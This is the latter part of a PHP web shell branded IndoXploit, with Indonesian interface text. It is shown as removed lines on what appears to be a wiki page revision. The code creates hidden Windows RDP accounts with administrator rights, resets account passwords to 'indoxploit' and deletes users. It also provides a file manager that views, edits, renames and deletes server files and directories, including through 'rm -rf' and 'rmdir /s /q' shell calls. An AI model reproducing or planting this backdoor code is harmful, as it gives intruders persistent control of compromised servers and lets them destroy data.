- if(preg_match("/​$user/",​ exe("​net user"​))) { 
- echo "​[INFO] -> <font color=red>​user <font color=lime>​$user</​font>​ sudah ada</​font>";​ 
- } else { 
- $add_user ​  = exe("​net user $user $pass /​add"​);​ 
-    $add_groups1 = exe("​net localgroup Administrators $user /​add"​);​ 
-    $add_groups2 = exe("​net localgroup Administrator $user /​add"​);​ 
-    $add_groups3 = exe("​net localgroup Administrateur $user /​add"​);​ 
-    echo "[ RDP ACCOUNT INFO ]<br> 
-    ------------------------------<​br>​ 
-    IP: <font color=lime>"​.$ip."</​font><​br>​ 
-    Username:​ <font color=lime>​$user</​font><​br>​ 
-    Password:​ <font color=lime>​$pass</​font><​br>​ 
-    ------------------------------<​br><​br>​ 
-    [ STATUS ]<br> 
-    ------------------------------<​br>​ 
-    "; 
-    if($add_user) { 
-    echo "[add user] -> <font color='​lime'>​Berhasil</​font><​br>";​ 
-    } else { 
-    echo "[add user] -> <font color='​red'>​Gagal</​font><​br>";​ 
-    } 
-    if($add_groups1) { 
-        echo "[add localgroup Administrators] -> <font color='​lime'>​Berhasil</​font><​br>";​ 
-    } elseif($add_groups2) { 
-            echo "[add localgroup Administrator] -> <font color='​lime'>​Berhasil</​font><​br>";​ 
-    } elseif($add_groups3) {  
-            echo "[add localgroup Administrateur] -> <font color='​lime'>​Berhasil</​font><​br>";​ 
-    } else { 
-    echo "[add localgroup] -> <font color='​red'>​Gagal</​font><​br>";​ 
-    } 
-    echo "​------------------------------<​br>";​ 
- } 
- } elseif($_POST['​s_opsi'​]) { 
- $user = htmlspecialchars($_POST['​r_user'​]);​ 
- if($_POST['​opsi'​] == '​1'​) { 
- $cek = exe("​net user $user"​);​ 
- echo "​Checking username <font color=lime>​$user</​font>​ ....... "; 
- if(preg_match("/​$user/",​ $cek)) { 
- echo "[ <font color=lime>​Sudah ada</​font>​ ]<br> 
- ------------------------------<​br><​br>​ 
- <​pre>​$cek</​pre>";​ 
- } else { 
- echo "[ <font color=red>​belum ada</​font>​ ]"; 
- } 
- } elseif($_POST['​opsi'​] == '​2'​) { 
- $cek = exe("​net user $user indoxploit"​);​ 
- if(preg_match("/​$user/",​ exe("​net user"​))) { 
- echo "​[change password: <font color=lime>​indoxploit</​font>​] -> "; 
- if($cek) { 
- echo "<​font color=lime>​Berhasil</​font>";​ 
- } else { 
- echo "<​font color=red>​Gagal</​font>";​ 
- } 
- } else { 
- echo "​[INFO] -> <font color=red>​user <font color=lime>​$user</​font>​ belum ada</​font>";​ 
- } 
- } elseif($_POST['​opsi'​] == '​3'​) { 
- $cek = exe("​net user $user /​DELETE"​);​ 
- if(preg_match("/​$user/",​ exe("​net user"​))) { 
- echo "​[remove user: <font color=lime>​$user</​font>​] -> "; 
- if($cek) { 
- echo "<​font color=lime>​Berhasil</​font>";​ 
- } else { 
- echo "<​font color=red>​Gagal</​font>";​ 
- } 
- } else { 
- echo "​[INFO] -> <font color=red>​user <font color=lime>​$user</​font>​ belum ada</​font>";​ 
- } 
- } else { 
- // 
- } 
- } else { 
- echo "-- Create RDP --<​br>​ 
- <form method='​post'>​ 
- <​input type='​text'​ name='​user'​ placeholder='​username'​ value='​indoxploit'​ required>​ 
- <​input type='​text'​ name='​pass'​ placeholder='​password'​ value='​indoxploit'​ required>​ 
- <​input type='​submit'​ name='​create'​ value='>>'>​ 
- </​form>​ 
- -- Option --<​br>​ 
- <form method='​post'>​ 
- <​input type='​text'​ name='​r_user'​ placeholder='​username'​ required>​ 
- <​select name='​opsi'>​ 
- <​option value='​1'>​Cek Username</​option>​ 
- <​option value='​2'>​Ubah Password</​option>​ 
- <​option value='​3'>​Hapus Username</​option>​ 
- </​select>​ 
- <​input type='​submit'​ name='​s_opsi'​ value='>>'>​ 
- </​form>​ 
- "; 
- } 
- } else { 
- echo "<​font color=red>​Fitur ini hanya dapat digunakan dalam Windows Server.</​font>";​ 
- } 
-} elseif($_GET['​act'​] == '​newfile'​) { 
- if($_POST['​new_save_file'​]) { 
- $newfile = htmlspecialchars($_POST['​newfile'​]);​ 
- $fopen = fopen($newfile,​ "​a+"​);​ 
- if($fopen) { 
- $act = "<​script>​window.location='?​act=edit&​dir="​.$dir."&​file="​.$_POST['​newfile'​]."';</​script>";​ 
- } else { 
- $act = "<​font color=red>​permission denied</​font>";​ 
- } 
- } 
- echo $act; 
- echo "<​form method='​post'>​ 
- Filename: <input type='​text'​ name='​newfile'​ value='​$dir/​newfile.php'​ style='​width:​ 450px;'​ height='​10'>​ 
- <input type='​submit'​ name='​new_save_file'​ value='​Submit'>​ 
- </​form>";​ 
-} elseif($_GET['​act'​] == '​newfolder'​) { 
- if($_POST['​new_save_folder'​]) { 
- $new_folder = $dir.'/'​.htmlspecialchars($_POST['​newfolder'​]);​ 
- if(!mkdir($new_folder)) { 
- $act = "<​font color=red>​permission denied</​font>";​ 
- } else { 
- $act = "<​script>​window.location='?​dir="​.$dir."';</​script>";​ 
- } 
- } 
- echo $act; 
- echo "<​form method='​post'>​ 
- Folder Name: <input type='​text'​ name='​newfolder'​ style='​width:​ 450px;'​ height='​10'>​ 
- <input type='​submit'​ name='​new_save_folder'​ value='​Submit'>​ 
- </​form>";​ 
-} elseif($_GET['​act'​] == '​rename_dir'​) { 
- if($_POST['​dir_rename'​]) { 
- $dir_rename = rename($dir,​ ""​.dirname($dir)."/"​.htmlspecialchars($_POST['​fol_rename'​]).""​);​ 
- if($dir_rename) { 
- $act = "<​script>​window.location='?​dir="​.dirname($dir)."';</​script>";​ 
- } else { 
- $act = "<​font color=red>​permission denied</​font>";​ 
- } 
- echo ""​.$act."<​br>";​ 
- } 
- echo "<​form method='​post'>​ 
- <input type='​text'​ value='"​.basename($dir)."'​ name='​fol_rename'​ style='​width:​ 450px;'​ height='​10'>​ 
- <input type='​submit'​ name='​dir_rename'​ value='​rename'>​ 
- </​form>";​ 
-} elseif($_GET['​act'​] == '​delete_dir'​) { 
- if(is_dir($dir)) { 
- if(is_writable($dir)) { 
- @rmdir($dir);​ 
- @exe("​rm -rf $dir"​);​ 
- @exe("​rmdir /s /q $dir"​);​ 
- $act = "<​script>​window.location='?​dir="​.dirname($dir)."';</​script>";​ 
- } else { 
- $act = "<​font color=red>​could not remove "​.basename($dir)."</​font>";​ 
- } 
- } 
- echo $act; 
-} elseif($_GET['​act'​] == '​view'​) { 
- echo "​Filename:​ <font color=lime>"​.basename($_GET['​file'​])."</​font>​ [ <a href='?​act=view&​dir=$dir&​file="​.$_GET['​file'​]."'><​b>​view</​b></​a>​ ] [ <a href='?​act=edit&​dir=$dir&​file="​.$_GET['​file'​]."'>​edit</​a>​ ] [ <a href='?​act=rename&​dir=$dir&​file="​.$_GET['​file'​]."'>​rename</​a>​ ] [ <a href='?​act=download&​dir=$dir&​file="​.$_GET['​file'​]."'>​download</​a>​ ] [ <a href='?​act=delete&​dir=$dir&​file="​.$_GET['​file'​]."'>​delete</​a>​ ]<​br>";​ 
- echo "<​textarea readonly>"​.htmlspecialchars(@file_get_contents($_GET['​file'​]))."</​textarea>";​ 
-} elseif($_GET['​act'​] == '​edit'​) { 
- if($_POST['​save'​]) { 
- $save = file_put_contents($_GET['​file'​],​ $_POST['​src'​]);​ 
- if($save) { 
- $act = "<​font color=lime>​Saved!</​font>";​ 
- } else { 
- $act = "<​font color=red>​permission denied</​font>";​ 
- } 
- echo ""​.$act."<​br>";​ 
- } 
- echo "​Filename:​ <font color=lime>"​.basename($_GET['​file'​])."</​font>​ [ <a href='?​act=view&​dir=$dir&​file="​.$_GET['​file'​]."'>​view</​a>​ ] [ <a href='?​act=edit&​dir=$dir&​file="​.$_GET['​file'​]."'><​b>​edit</​b></​a>​ ] [ <a href='?​act=rename&​dir=$dir&​file="​.$_GET['​file'​]."'>​rename</​a>​ ] [ <a href='?​act=download&​dir=$dir&​file="​.$_GET['​file'​]."'>​download</​a>​ ] [ <a href='?​act=delete&​dir=$dir&​file="​.$_GET['​file'​]."'>​delete</​a>​ ]<​br>";​ 
- echo "<​form method='​post'>​ 
- <​textarea name='​src'>"​.htmlspecialchars(@file_get_contents($_GET['​file'​]))."</​textarea><​br>​ 
- <input type='​submit'​ value='​Save'​ name='​save'​ style='​width:​ 500px;'>​ 
- </​form>";​ 
-} elseif($_GET['​act'​] == '​rename'​) { 
- if($_POST['​do_rename'​]) { 
- $rename = rename($_GET['​file'​],​ "​$dir/"​.htmlspecialchars($_POST['​rename'​]).""​);​ 
- if($rename) { 
- $act = "<​script>​window.location='?​dir="​.$dir."';</​script>";​ 
- } else { 
- $act = "<​font color=red>​permission denied</​font>";​ 
- } 
- echo ""​.$act."<​br>";​ 
- } 
- echo "​Filename:​ <font color=lime>"​.basename($_GET['​file'​])."</​font>​ [ <a href='?​act=view&​dir=$dir&​file="​.$_GET['​file'​]."'>​view</​a>​ ] [ <a href='?​act=edit&​dir=$dir&​file="​.$_GET['​file'​]."'>​edit</​a>​ ] [ <a href='?​act=rename&​dir=$dir&​file="​.$_GET['​file'​]."'><​b>​rename</​b></​a>​ ] [ <a href='?​act=download&​dir=$dir&​file="​.$_GET['​file'​]."'>​download</​a>​ ] [ <a href='?​act=delete&​dir=$dir&​file="​.$_GET['​file'​]."'>​delete</​a>​ ]<​br>";​ 
- echo "<​form method='​post'>​ 
- <input type='​text'​ value='"​.basename($_GET['​file'​])."'​ name='​rename'​ style='​width:​ 450px;'​ height='​10'>​ 
- <input type='​submit'​ name='​do_rename'​ value='​rename'>​ 
- </​form>";​ 
-} elseif($_GET['​act'​] == '​delete'​) { 
- $delete = unlink($_GET['​file'​]);​ 
- if($delete) { 
- $act = "<​script>​window.location='?​dir="​.$dir."';</​script>";​ 
- } else { 
- $act = "<​font color=red>​permission denied</​font>";​ 
- } 
- echo $act; 
-} else { 
- if(is_dir($dir) === true) { 
- if(!is_readable($dir)) { 
- echo "<​font color=red>​can'​t open directory. ( not readable )</​font>";​ 
- } else { 
- echo '<​table width="​100%"​ class="​table_home"​ border="​0"​ cellpadding="​3"​ cellspacing="​1"​ align="​center">​ 
- <​tr>​ 
- <th class="​th_home"><​center>​Name</​center></​th>​ 
- <th class="​th_home"><​center>​Type</​center></​th>​ 
- <th class="​th_home"><​center>​Size</​center></​th>​ 
- <th class="​th_home"><​center>​Last Modified</​center></​th>​ 
- <th class="​th_home"><​center>​Owner/​Group</​center></​th>​ 
- <th class="​th_home"><​center>​Permission</​center></​th>​ 
- <th class="​th_home"><​center>​Action</​center></​th>​ 
- </​tr>';​ 
- $scandir = scandir($dir);​ 
- foreach($scandir as $dirx) { 
- $dtype = filetype("​$dir/​$dirx"​);​ 
- $dtime = date("​F d Y g:​i:​s",​ filemtime("​$dir/​$dirx"​));​ 
- if(function_exists('​posix_getpwuid'​)) { 
- $downer = @posix_getpwuid(fileowner("​$dir/​$dirx"​));​ 
- $downer = $downer['​name'​];​ 
- } else { 
- //​$downer = $uid; 
- $downer = fileowner("​$dir/​$dirx"​);​ 
- } 
- if(function_exists('​posix_getgrgid'​)) { 
- $dgrp = @posix_getgrgid(filegroup("​$dir/​$dirx"​));​ 
- $dgrp = $dgrp['​name'​];​ 
- } else { 
- $dgrp = filegroup("​$dir/​$dirx"​);​ 
- } 
- ​ if(!is_dir("​$dir/​$dirx"​)) continue; 
- ​ if($dirx === '​..'​) { 
- ​ $href = "<a href='?​dir="​.dirname($dir)."'>​$dirx</​a>";​ 
-  } elseif($dirx === '​.'​) { 
- ​ $href = "<a href='?​dir=$dir'>​$dirx</​a>";​ 
-  } else { 
- ​ $href = "<a href='?​dir=$dir/​$dirx'>​$dirx</​a>";​ 
-  } 
- ​ if($dirx === '​.'​ || $dirx === '​..'​) { 
- ​ $act_dir = "<a href='?​act=newfile&​dir=$dir'>​newfile</​a>​ | <a href='?​act=newfolder&​dir=$dir'>​newfolder</​a>";​ 
- ​ } else { 
- ​ $act_dir = "<a href='?​act=rename_dir&​dir=$dir/​$dirx'>​rename</​a>​ | <a href='?​act=delete_dir&​dir=$dir/​$dirx'>​delete</​a>";​ 
-  } 
- ​ echo "<​tr>";​ 
- ​ echo "<​td class='​td_home'><​img src='​data:​image/​png;​base64,​R0lGODlhEwAQALMAAAAAAP///​5ycAM7OY///​nP//​zv/​OnPf39////​wAAAAAAAAAAAAAAAAAAAAAA"​."​AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"​."/​4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>​$href</​td>";​ 
- echo "<​td class='​td_home'><​center>​$dtype</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>​-</​center></​th></​td>";​ 
- echo "<​td class='​td_home'><​center>​$dtime</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>​$downer/​$dgrp</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>"​.w("​$dir/​$dirx",​perms("​$dir/​$dirx"​))."</​center></​td>";​ 
- echo "<​td class='​td_home'​ style='​padding-left:​ 15px;'>​$act_dir</​td>";​ 
- echo "</​tr>";​ 
- } 
- } 
- } else { 
- echo "<​font color=red>​can'​t open directory.</​font>";​ 
- } 
- foreach($scandir as $file) { 
- $ftype = filetype("​$dir/​$file"​);​ 
- $ftime = date("​F d Y g:​i:​s",​ filemtime("​$dir/​$file"​));​ 
- $size = filesize("​$dir/​$file"​)/​1024;​ 
- $size = round($size,​3);​ 
- if(function_exists('​posix_getpwuid'​)) { 
- $fowner = @posix_getpwuid(fileowner("​$dir/​$file"​));​ 
- $fowner = $fowner['​name'​];​ 
- } else { 
- //​$downer = $uid; 
- $fowner = fileowner("​$dir/​$file"​);​ 
- } 
- if(function_exists('​posix_getgrgid'​)) { 
- $fgrp = @posix_getgrgid(filegroup("​$dir/​$file"​));​ 
- $fgrp = $fgrp['​name'​];​ 
- } else { 
- $fgrp = filegroup("​$dir/​$file"​);​ 
- } 
- if($size > 1024) { 
- $size = round($size/​1024,​2). '​MB';​ 
- } else { 
- $size = $size. '​KB';​ 
- } 
- if(!is_file("​$dir/​$file"​)) continue; 
- echo "<​tr>";​ 
- echo "<​td class='​td_home'><​img src='​data:​image/​png;​base64,​iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/​9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/​wD/​oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/​qlvdtM38BNgJQmQgJGd+A/​MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//​zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/​b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/​hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/​Hw/​MjH6/​T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/​ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/​Lsbe3964sS7+4uEjunpqmSe6e3D3N5/​N0WZbtly9f09nZ2Z/​b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/​PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><​a href='?​act=view&​dir=$dir&​file=$dir/​$file'>​$file</​a></​td>";​ 
- echo "<​td class='​td_home'><​center>​$ftype</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>​$size</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>​$ftime</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>​$fowner/​$fgrp</​center></​td>";​ 
- echo "<​td class='​td_home'><​center>"​.w("​$dir/​$file",​perms("​$dir/​$file"​))."</​center></​td>";​ 
- echo "<​td class='​td_home'​ style='​padding-left:​ 15px;'><​a href='?​act=edit&​dir=$dir&​file=$dir/​$file'>​edit</​a>​ | <a href='?​act=rename&​dir=$dir&​file=$dir/​$file'>​rename</​a>​ | <a href='?​act=delete&​dir=$dir&​file=$dir/​$file'>​delete</​a>​ | <a href='?​act=download&​dir=$dir&​file=$dir/​$file'>​download</​a></​td>";​ 
- echo "</​tr>";​ 
- } 
- echo "</​table>";​ 
- if(!is_readable($dir)) { 
- // 
- } else { 
- echo "<​hr>";​ 
- } 
- echo "<​center>​Copyright &copy; "​.date("​Y"​)."​ - <a href='​http://​indoxploit.or.id/'​ target='​_blank'><​font color=lime>​IndoXploit</​font></​a></​center>";​ 
-} 
-?> 
-</​html>​ 
issues/cashing_in_on_trans.1506110808.txt.gz · Last modified: 2018/02/12 16:52 (external edit)